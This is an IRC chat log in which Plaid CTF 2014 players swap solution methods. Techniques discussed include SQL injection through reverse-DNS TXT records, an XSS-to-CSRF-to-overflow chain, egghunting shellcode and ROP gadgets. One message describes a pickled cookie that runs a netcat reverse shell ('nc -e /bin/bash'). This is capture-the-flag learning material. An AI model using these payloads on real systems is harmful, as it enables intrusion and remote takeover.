LuckyY> phiber__: +1
<abuss> it took me a while to get it to work
<deject3d> yeah i never got my cookies to work
<abuss> cause I didn't notice django had their own b64_decode that tweaked padding
<deject3d> humph
<deject3d> i tried for so long to get a cookie to work
<deject3d> oh well
<abuss> then you assemble a pickle that calls os.system('nc -e /bin/bash/ server port')
== chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
abuss> and use the shell to run a program on a file that spits the key
<geobot> sweet, i'm finally getting out about ctf and change it in donald glover, it spits out that some of us are going to open source code for about pony porn warez
<phiber> the mourse cursor doesn't change when hovering over any clickable thing
<deject3d> ah damn
<phiber> so it was really hard to notice the board was interactive
<abuss> agree with phiber, changing the mouse cursor when over something clickable would have been nice
<awesie> phiber abuss: i agree, forgot about that; UX is hard when you are the designer / developer / tester
<+mischa__> whatscat writeups available?
<[CISSP]HoLyVieR> mscha__: check the reset password feature
<[CISSP]HoLyVieR> mischa__: there's a SQLi in there
<Dumpling> sqli via your rdns?
[CISSP]HoLyVieR> no the username
<Sin__> via username
<phiber> I did sqli via rdns records
tsuro> damn, we did it via rdns :)
<tylerni7> rdns was probably easier
<+phiber> much easier than blind sqli on username
<tylerni7> yeah
<+xp45g> via rdns O_o
<mischa__> we had a sqli in our TXT record
<abuss> phiber, huh that's cool
<[CISSP]HoLyVieR> username was a pain to exploit tough 64 caracters limit :/
<abuss> which provider lets you screw with rdns like that?
<xp45g> i used username to test one flag char at a time
<abuss> ah
xp45g> if test was successful the query would reset pass for my 2nd account
<KT> btw who is 0xffa?
<== [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 240 seconds]
fester> actually, you just need a rdns to point to a valid dns, it looks up all records of the dns entry (even txt)
<phiber> abuss, your provider usually only lets you change the rdns entry
<mserrano> KT: eindbazen + fail0verflow
<+== ltfish [~Fish@] has quit [Ping timeout: 240 seconds]
phiber> so you point that to a host you control
<== skuu [~thesku@77-57-2-114.dclient.hispeed.ch] has joined #pctf
phiber> and a dns server you control
<KT> mserrano: oh, i see, thx
<Guest17539> is there any writeup for hudak?
inter> looking for solutions to tenement
<iZsh> tylerni7: there is an easier way for curlcore
<== Saxophie [~sophie@ip-83-134-206-91.dsl.scarlet.be] has quit [Quit: WeeChat 0.3.7]
tylerni7> iZsh: how'd you do it?
<+iZsh> tylerni7: you get the sessionID from wireshark, you search for this, and the masterkey is just before that key, then you feed that to wireshark and that's it
<fester> i asked my provider to change my rdns txt entry and they marked my vps as 'High Risk'
<Reinhart> mserrano: we ended up solving it using the slide attack, but also had a brute forcer running that ended up finding the flag while I was sleeping
<ciliated> how to solve doge_stage?
<tylerni7> iZsh: ah, interesting
<+iZsh> tylerni7: that's why it took like a few minutes to solve :)
plaintext> we solved doge by sorting the palette by number of pixels that have that color
<plaintext> and changing the top N to black
<clockish> ciliated: one way is to randomize the palate colors
<+mserrano> Reinhart: hehe
<+plaintext> the key starts appearing
<clockish> plaintext: yep
<+corpille> gimp -> map ;)
<[CISSP]HoLyVieR> at 127 to 208
<mserrano> next time I will make the blocks bigger
<+mserrano> so that that doesn't work
<+ciliated> thanks
<inter> real
<inter> [14:52] <+mserrano> next time I will make the blocks bigger
<D3AdCa7_> I solve doge by divide that image into two...
<mserrano> inter: 3 bytes is not that many bytes
<+inter> you could have 1
<[CISSP]HoLyVieR> change the color of palette from 127 to 208 to black and rest white and it gives the text
<abuss> were there any solutions to halpjs that didn't involve string tricks?
mserrano> abuss: not afaik
<+abuss> more to the point, were there any x besides 1 and 6 such that mystop(x) == x?
<Rinko> a random shuffle on the palette works well though
<abuss> ah
<plaintext> it's impossibru without string ticks
<inter> o
<inter> btw
<plaintext> you need 3 different values map to themselves
<inter> mserrano,
<inter> how did you guys
<abuss> okay that's a bit comforting then :P
<inter> manage to fix the server load
<inter> in the early stage of ctf?
<mserrano> inter: I honestly have no idea
<+inter> im more interested in that
<Reinhart> mserrano: this solved it purely by bruteforce in ~6hrs or so https://p.6core.net/p/hoVp1HHotIIKVpVBTyL1xRJ8
<== bool101 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has quit [Ping timeout: 245 seconds]
mserrano> the relevant people worked magic the way they always do
<+phiber> crypto parlor was hash length extension right?
<== albntomat0 [8c201003@gateway/web/freenode/ip.] has joined #pctf
mserrano> phiber: yes
<+tylerni7> inter: cai_ and awesie worked their magic
<+Tapyroe__> Reinhart: which problem was that for?
<jmgrosen> Dumpling: did you write those write-ups?
<inter> OHH
<phiber> I didn't have enough time to code everything
<Dumpling> jmgrosen: two out of the three
<mserrano> yeah
<+mserrano> there's like some rule of the universe that says that everything must go wrong on friday at 5 pm
<+jmgrosen> Dumpling: could you explain kpop? I don't get how the system() call is getting eval'd
<mserrano> and then magic happens and it eventually gets fixed
<+deject3d> where was the flag for whatscat? was it in the database?
<== Sin__ [~R@] has quit [Ping timeout: 240 seconds]
<+Reinhart> Tapyroe__: wheeee
<phiber> also I got up to $64K playing manually lol
<cai_> inter: awesie will post some notes on that on our blog
<+Dumpling> jmgrosen: preg_replace has a /e flag for dynamic replacements and stuff, it basically evals code
<corpille> what was tenement ?
<robbje> corpille: egghunting shellcode
<jmgrosen> Dumpling: ........wow, that's pretty ridiculous o_O
<Reinhart> Tapyroe__: but as I said, we solved it using the slide attack before this brute forcer finished
<jmgrosen reminds himself never to use php
* abuss> I was going to script parlor to keep betting the farm on 2^20 odds, which would've required 500,000 requests or so
<Tapyroe__> ah right, Reinhart! thanks :) dont think I even tried wheeee
<corpille> egghunting shellcode mmm ... okay :)
<abuss> it was going too slowly, but did anyone else manage that?
<== lkwpeter [~florian@p5DDCCDB7.dip0.t-ipconnect.de] has joined #pctf
deject3d> whatscat was a sql injection but was the flag stored in a file? were file perms on or anything?
[CISSP]HoLyVieR> deject3d: I heard it was in "flag" table
<geobot> his dinner table x|
<xp45g> deject3d: flag was in the db
<iZsh> O.o about https://twitter.com/HacknamStyle/status/455453769824612352
<spq> hm, i didnt know we can still write into /dev/mem (for python jail) solved it completely within python (python function opcodes -> libc system("/bin/sh") )
<abuss> NICE
<Dumpling> spq: got a writeup for that?
<inter> does any of you know solutions to curlcore?
<iZsh> hijacking the support email is a nice way to get hints ;-)
<deject3d> anyone have a brony writeup?
<spq> Dumpling: not ready :D
<Rinko> btw does "hudak" refers to Paul Hudak? closure and lazy evaluation everywhere in this problem
<phiber> I tried replacing function bytecode, but if I replaced it with something that imported os it failed
<mserrano> Rinko: yes.
<+plaintext> yep
<___Sin> iZsh, that's so nasty
<plaintext> we only figured out that hint in the end
<phiber> anyone did it that way?
<mserrano> phiber: we held an import lock
<+plaintext> hudak was a nice task btw
<mserrano> phiber: so you couldn't import anyway
<+inter> phiber: acquire_lock()
<phiber> oh
<inter> but
<inter> does anyone know solutions to curlcore?
<iZsh> inter: yes
<inter> iZsh: may i pm you :D
<mserrano> inter: find the aes keys, decrypt the traffic, get flag
<+inter> well
<iZsh> mserrano: easier way :)
<inter> i looked for
<inter> temporary ssl keys
<inter> in corefile
<phiber> I also thought about writing to /self/mem but I was too busy on other challenges
<== ciliated [99bd4541@gateway/web/freenode/ip.] has quit [Quit: Page closed]
== phreeek [~magnus@adversec.com] has joined #pctf
inter> but i didnt find any patterns
<inter> what was the methods to find the aes key in the corefile?
<phiber> there were too many challenges
<iZsh> inter: you can open it in wireshark, look at the SessionID, search for it in a hex editor in the dump, just before that, you'll have the size of the sessionid, and then before that, the masterkey
<geobot> and the masterkey is just before
<inter> open corefile?
<phreeek> mserrano: one question to kpop, I got only a 500 error with your payload
<inter> oh
<inter> nvm
<inter> OHH
<inter> okay
<iZsh> inter: then you write a file called key.txt which contains the sessionid and the masterkey and you can feed that to wireshark for decryption
<inter> wow
<inter> damn
<inter> it feels like a hammer just slammed my face to the floor
<inter> thanks iZsh :D
<iZsh> that one was fast to solve :)
<inter> well
<inter> my brain was already tortured by misc250 and pyjail
<inter> n0sleep.tv
<plaintext> damn, who handles the Plaid twitter acc?
<plaintext> i made a mistake with my writeup :8
<foundation> http://pastebin.com/3Kw2HZjP patch for tor for rendezvous
<inter> yeah
<inter> i knew
<inter> what i wanted to do
<inter> but i couldnt find the function get_node_by_name or something
<inter> i tried hardcoding to fill out the structs
<inter> but i failed LOL
<dwn> how were we suppsoed to guess there was a flags table in whatscat ;_;
<foundation> took a while
<dwn> also that box has the slowest updating dns cache
inter> at least i learned 2 things today
<inter> 1. dont eat overnight chinese food
<NK_> tylerni7 / cai_ well done, it was great
<NK_> :)
<inter> 2. buy ida
<Adran> 1. seems like poor life choice
<inter> well
<chuckleberry> foundation: nice!
<inter> some of the ppps
<inter> ate overnight chinese food
<inter> so i decided to do that as well
<Adran> is that why we had a massive netsplit?!
<inter> and as it turned out i like overnight pho better
<Adran> the servers ate old Chinese food?
<== chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
robbje> want zfs writeup
<phiber> dwn, custom dns server with twisted and ttl=0 FTW
<jix> foundation: I gave up following this async spaghetti mess
<dwn> phiber: how do you set that up
<sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
<sven> robbje: ^--
<Adran> phiber: what did you use that for?
<jix> foundation: instead I patched the bandwidth + weight calculation
<dwn> would like to see a writeup on that, lol, phiber
< <jix> foundation: to make chandler the #1 candidate for everything
<phiber> Adran, whatscat
upb> < dwn> how were we suppsoed to guess there was a flags table in whatscat ;_; <- haha, i gave up on that aswell, thought about reading out information_schema.tables but php munges . in txt record value for some reaosn
<plaintext> who is in charge of the plaid twitter?
<inter> cai_: when i ran into obstacles i listened to this
<Adran> phiber: got a writeup?
<_blasty_> ricky: tylerni7: mserrano: how much longer is bronies going to be up ?
<inter> it magically calmed me down lul
<_blasty_> I wanna refine some stuff in the AM
_blasty_> not fucking now, though
<tylerni7> plaintext: most of us have control of it
<+deject3d> anyone have strategies on solving brony? i don't really understand how attacking the internal target was supposed to work
<inter> brony?
<_blasty_> deject3d: XSS
<inter> i know 2nd part
<inter> deals with shit ton of stuff
<robbje> sven: xor. ...
<deject3d> yeah but the xss wasn't the attack on the actual target
<foundation> btw, about brony, what was the first part, i did get the PHPSESSIONID , what then ?
<dwn> _blasty_: the fuck did you use xss to do though
<deject3d> i want to know how we were supposed to use the xss to attack the internal panel
<_blasty_> deject3d: so using the XSS in the ponies website you can execute a CSRF POST against the login form of the portal page
<nurfed_> xss->csrf->expolt leak->xss->csrf->exploit->/bin/bash
<_blasty_> if you feed the portal page more than N chars in the OTP field it will segfault
<_blasty_> if you keep feeding it chars it will trigger the "stack smashing detected" message
<_blasty_> the "stack smashing detected" message has the progname in it
<foundation> ooooo....
<foundation> niceeee
<_blasty_> like STACK SMASHING DETECTED: ./checkotp terminated
<deject3d> what is the point of the csrf? we could already see the 'internal' login page, right? or am i misinformed
<dwn> _blasty_: what values did you post to the login form though?
<_blasty_> but the pointer to that argv0 checkotp string could be overwritten
<_blasty_> so get your own input in the output again
<_blasty_> then you basically elevevate XSS privileges to that domain
<== albntomat0 [8c201003@gateway/web/freenode/ip.] has quit [Quit: Page closed]
_blasty_> from where you can leak the admin cookie
<_blasty_> we'll do a proper writeup
<phiber> dwn, Adran https://privatepaste.com/6413fc0aca
<_blasty_> this explanation sucks
<_blasty_> part#2 is even cooler
<deject3d> would appreciate it
<deject3d> i tried using beef framework to start some attacks against the internal site but owell
<inter> well
<dwn> wow, you actually wrote your own dns server phiber. amazing.
<inter> now i can go do my kush
<inter> happily
<inter> lul
<_blasty_> I also "wrote" my "own" DNS server for whatscat, using some perl module :-P
<inter> now that i figured out the stuff that i couldnt do :D
<_blasty_> Net::DNS::Server or something
<_blasty_> yay perl.
plaintext> we did whatscat with blind sqli
<tylerni7> dinner time for PPP
<+tylerni7> we'll be back online laterz
<+_blasty_> we did whatscat by updating the email field in the DB
<== xire_ [~marco@adsl-ull-93-153.49-151.net24.it] has quit [Quit: Lost terminal]
plaintext> tylerni7, I sent you a message :)
<Adran> phiber: ugh, inject was dns
<dwn> how did you all do tenement?
<_blasty_> then requesting the reset page again for that user to leak back the value we inserted into the email field
<Adran> didn't think about that. thanks
dwn> it was 100pts so it must've been incredibly easy
<dwn> but the seccomp
<foundation> dwn: no need for the shell, just egghunt for PPPP in memory
<pctf_scoreboard> o/
Adran> the scoreboard is speaking!
<dwn> was PPPP in a static location
<foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
<dwn> oh, neat
<dwn> thanks will remember that
<foundation> it was in some mmaped region , but we didn't know where
<deject3d> was there a trick to solving polygonshifter web100
<plaintext> just blind sqli
<plaintext> nothing extra
<foundation> afaik bsqli
<deject3d> wait, it was a sqli
<deject3d> oh god damnit
<plaintext> i guess I will make quick a writeup on that too
<Tapyroe__> !! -.-
<pd7> plaintext: are your writeups online yet?
<plaintext> pd7: i made one on halphow2js
<Tapyroe__> sitting here thinking about all the problems i could've solved haha....
<dwn> was there some neat way to evaluate all the templates in G++ for you
<nurfed_> web100 was stupid :/
<geobot> on web100 chicken
<Tapyroe__> or rather, should've been able to solve haah
<dwn> because we just worked G++ out on paper
<D3AdCa7_> Is polygonshifter can be solved by union way?
<plaintext> plaid retweeted it but I removed that tweet dammit, because there was a typo :P
<deject3d> i took the problem description at face value and tried to actually brute force the login
<plaintext> and now it's not retweeted, no fame :(
<D3AdCa7_> My bsqli script runs so slow
<foundation> dwn: apparentlly you needed to figure out that it's actually just doing matrix multiplication over galois field 257 ...
<pcc7> a writeup for pyjail?.
<deject3d> the html comment "admin / ???????" made me think it was actually a 7 char password. "polygon" and "shifter" are both 7 chars each, so i wrote a script to try every combination involving case
<deject3d> WHAT A WASTE
<== Stean [~Stean@hlab.informatik.uni-mannheim.de] has joined #pctf
D3AdCa7_> u r so cute.. deject3d :)
<plaintext> it wasn't misc 10 though :P
<iZsh> how did you guys solve tenement? because it took me forever and some ppl solved it quickly, so i'm wondering if i missed an easier way
<dwn> plaintext: link to your how2js writeup?
<dwn> iZsh: 18:14 < foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
<cimmi_> what was actually the answear to the math is hard?
< <mathiasbynens> plaintext: in your how2js writeup, “The keys cannot be in increasing order” → wut?
<plaintext> mathiasbynens: is that a mistake?
<plaintext> let me check
<foundation> iZsh: took a while to figure out how not to segfault on invalid pages
<plaintext> oh right, lol
<plaintext> i'm dumb
<D3AdCa7_> a script for web100 https://gist.github.com/D3AdCa7/10604720
<foundation> cimmi_: 100000
<plaintext> I'll add a clarification
<== Bono [1b7f597e@gateway/web/freenode/ip.] has joined #pctf
mathiasbynens> plaintext: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme they’re sorted lexicographically
<iZsh> dwn: what did you write? i'm not sure i follow, but i dont remember exactly the whole thing :)
<mathiasbynens> but you knew that
<foundation> cimmi_: google excel 65000 100000 for clarification
<plaintext> yeah, brainfart
<mathiasbynens> plaintext: i'll add a link to your write-up, let me know if you write more!
<== naehrwert [~naehrwert@84-72-164-134.dclient.hispeed.ch] has joined #pctf
plaintext> thanks :)
<plaintext> I'll do one on polygon I guess
<cimmi_> yea I actually did read it when I tried to find the answear
<dwn> iZsh: tenement basically just executed your buffer but there was seccomp so you're not going to read the file or get shell. I wasn't able to get around this because I couldn't figure out how to find the flag in memory. foundation just dumped the whole memory.
<skuu> plaintext: did you mention hudak? if so; remember the flag so I can check where I went wrong?
<iZsh> dwn: we solved it completely differently, we called malloc(16) and had some smart filtering to recognize the proper pointers to follow
<cimmi_> I submitted 10k and not 100k when looking at that one. stupid
<|x_x|> http://csrc.tamuc.edu/css/?p=156 Lazy man's doge_stege writeup
<foundation> iZsh: we just wrote egghunt shellcode that traversed the memory , the trick was to see which addresses were actually mapped , using write() you can check if the address is valid or not
<plaintext> i think I have the hudak flag
<iZsh> foundation: oh i see
<plaintext> skuu: 4t_l34st_it_was_1mperat1v3...
<skuu> oh wow, thanks
<iZsh> well, we did it the complicated way ;-)
<|x_x|> http://csrc.tamuc.edu/css/?p=152 Sanity Check, Heartbleed, and Multiplication is Hard as well. ya know, in case ya had problems with Sanity Check.
<skuu> soo close
<abuss> cimmi_, ouch; why wouldn't you just submit 100000? :P
<== zzoru [6e23254c@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
abuss> sanity check was a really hard web problem
iZsh> foundation, dwn : So libjansson has a reference-count based object system, and when a successful address has been found from the json array, it free()'s both the json integer object and the json array containing the same integer, so when dumping all the free()'d objects (by malloc'ing 16 bytes and dumping the contents), you'll see the reference count of 0 for a lot of objects, and reference count -1 for the chosen address.
<iZsh> Then &0xfffff000 it and dump the buffer, and you get the flag;
abuss> <f5><f5><f5><f5><f5> ooh a flag - submit? no it timed out <f5> <f5> <f5> <f5> <f5>
<cimmi_> abuss: who knows? atleast not me
<abuss> "Logged in as Samurai, abort!"
<dwn> nice iZsh
<iZsh> the write() trick is nice :)
<iZsh> much easier
<spq> admins: what was wrong with the scoreboard being unreachable from some places in the first hours?
<iZsh> i spent hours and hours no tenement
<dwn> yeah for only 100pts
<dwn> ;_;
<iZsh> i wonder how we were supposed to solve it
<iZsh> if they expected 100pt
<geobot> only 100pt for a bit, or a school/work day - in pm about rarverseme?
<iZsh> tylerni7: what was the expected way?
<mathiasbynens> iZsh: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/tenement#readme dump the whole memory then run strings
<== Mawekl [~chatzilla@aajb235.neoplus.adsl.tpnet.pl] has quit [Quit: lulu]
dwn> all these todo writeups mathiasbynens, lol
<iZsh> mathiasbynens: lol
<iZsh> mathiasbynens: that could be summarized as "get the flag"
<mathiasbynens> dwn: yeah the point is for people to help ;)
<mathiasbynens> iZsh: inorite
dwn> this hash length extension thing is the most obscure web thing ever. i love it
<dwn> ppp: will the challenge sources be released? or some way for us to run them ourselves to try to complete them?
<iZsh> well hash length extension is a classic
<dwn> is it? I've been ctfing for about a year and don't remember seeing it
iZsh> it's not the first time i see one, but can't recall where
upb> yeah but how the hell was it supposed to be guessed that the serialized string is reversed before hashing?
<iZsh> anyway, i'm off
<phiber> upb, get admin.php source
<|x_x|> Which could be obtained by feeding admin.php through the ?page= variable.
Digihash> Goodbye, thank you guys for the great CTF
<dwn> upb: you could get the source
<grollicus_> did you ever sql inject via dns records? that challenge was especially funny because there seems to be some vuln in the management software of the first domain we tried to use
dwn> grollicus_: I actually encountered the same thing
<upb> HAH
<dwn> reported it
<phiber> I could have solved parlor in time if python/pypy wasn't so slow
< <poppopret> my mtgox web 150 writeup
<spq> how did you solve harry potter?
<phiber> tylerni7, you could have given more bits of the md5 :/
<sven> or you could've written your brute forcer in c :P
<chuckleberry> huh, of all of the challenges most people think mtgox needed a writeup?
<phiber> I didn't have enough time for that
<phiber> there were like 10min left when I had the attack implemented
<chuckleberry> life's hard
sven> we ran out of time to solve moscow too - it happens :)
<foundation> 4st _l34t t1mpera _wa _it_ at_ as_1v3... << damn , so close
<chuckleberry> poppopret: i didn't even get a mention!
<chuckleberry> bad form
<poppopret> huh?
<chuckleberry> remember, you pmd me
<spq> regarding harry potter: i really had problems finding gadgets, made it with very weird add [rbx-something], cl; cl was horrible to control - when i had that, i patched one got entry to point to system and the did a dereferencing call to that entry
<chuckleberry> asked me for help...
<poppopret> ok how would you like to be credited :)
<foundation> spq: same here afaik
<chuckleberry> i was joking
poppopret> hahah ok
<spq> foundation: how did you control cl? the add cl, cl + dec cl ?
<naehrwert> spq, writing byte by byte using mov [rax], bl @ 401798
spq> naehrwert: well i had writing byte by byte working but didnt know what to do
<skuu> spq: foundation: we didn't use system(), we used vsyscalls execve
<plaintext> how did you guys solve sass btw?
<plaintext> we thought about jumping to read to cause one more buffer overflow, but it was too late
<_blasty_> hey naehrwert , you were also playing ?
<spq> skuu: which vsyscalls?
<spq> the stuff in 0xfffff... ?
<skuu> yep
<spq> damn
<naehrwert> hi _blasty_ :) yup with skuu and foundation and some other nice guys
<_blasty_> cool :)
<_blasty_> what team? Binary bandits?
<naehrwert> gn00bz
<_blasty_> ah, right
<spq> tried that, didnt work on my machine, detected unaligned jump into the page
<skuu> yup, ubunutu and what not catches it
skuu> but works on debian :D
<spq> damn
<skuu> 3.2 kernel ish
<spq> that would have meant 1-2hrs less :)
spq> but was interesting how one can control a register with such obscure gadgets :)
plaintext> anyone who solved sass?
naehrwert> so for parlor, is that '+' meant as concat. or addition?
<phiber> haha
<Galactic> dwn: RuCTF had a hash length extension attack.
<naehrwert> I tried like every possible combo but could never reproduce server output -.-
<phiber> I also got stuck there and had to ask about it
sven> int(md5(servernonce.decode("hex") + clientnonce + "\n").hexdigest(), 0x10)
<alexwebr> Read all the scrollback, didn't see TL;DR for freya. Looked like MS-KKDPC, said FTS after reading krb5 ASN.1 from RFC. Anybody get it?
<sven> i got it
<sven> it was annoying as fuck :)
<naehrwert> I'm pretty sure that was one way I tried it too, hmm :D
<sven> alexwebr: you need to grab the http branch from https://github.com/nalind/krb5/compare/http
<sven> and then change around /etc/krb5.conf until you can finally kinit ppp and then ssh ppp@shell.woo.pctf
<alexwebr> sven: cool, and "shellpls" was actually the password?
<sven> for the kerberos login, yeah
<sven> (the kinit ppp part)
alexwebr> sven: Cool. I was expecting I'd have to write a proxy thing myself. Cool that there's code already. Thanks :-)
<sven> yeah, i started writing my own proxy when i googled for some magic constant and found that git :-)
sven> when i saw frozencemetery was the author of that patch i knew i was looking in the right direction ;)
<alexwebr> Haha
<sven> and then i failed for 3 hours because ssh was linked against some wrong version of the library \o/
|x_x|> http://csrc.tamuc.edu/css/?p=169 Twenty Writeup
cimmi_> any parlor writeups?
== jmgrosen [~jmgrosen@ip68-227-85-44.sb.sd.cox.net] has quit [Quit: jmgrosen]
plaintext> i guess everyone is sleeping right now
|x_x|> Sleeping or realizing they just spent a weekend eating cold pizza and hacking instead of doing Calculus III homework that is due tomorrow.
<plaintext> lol I do have an assignment due tomorrow
<plaintext> crap
<rray> assignment + essay ;_;
<tokki> fak i wanted to log the whole channel
<tokki> but this webirc killed it
tokki> any angel who wants to past it on pastebin <3
<deject3d> i get to learn haskell tonight, yay procrastination
<plaintext> deject3d: did you solve hudak?
<chuckleberry> i need to learn why i'm so fucking bad at ctfs and how to fix that
<deject3d> no, but i just went through my professors slides and literally saw the hudak name
<deject3d> and was like "oh must have been a haskell challenge"
<plaintext> well it was, kinda, sorta
dwn> |x_x|: due tomorrow? wow, how nice. mine is midnight tonight ;_;
<plaintext> dwn: what timezone?
<Adran> tokki: sure
<== poppopret [~poppopret@c-67-169-180-57.hsd1.ca.comcast.net] has quit [Ping timeout: 258 seconds]
dwn> plaintext: EST
<|x_x|> dwn: Mine is due at noon tomorrow.
<dwn> just need to pwn this submission server and i'll be set
|x_x|> tokki: http://paste2.org/IIcALYLX
<plaintext> damn, CTFs are unhealthy
<Adran> tokki: http://pastebin.com/tpeyNqJH
<plaintext> 48 hours of sitting, barely eating and sleeping
<Adran> looks like |x_x| beat me to it
<Xor0X> totally worth it though
<plaintext> yep
azet> ohai
azet> any writeups online yet? (rsa, parlor, wheee)?
<|x_x|> I may not have ranked in the top 10 spots, but at least I made it in the top 14%. That's close enough. >_>
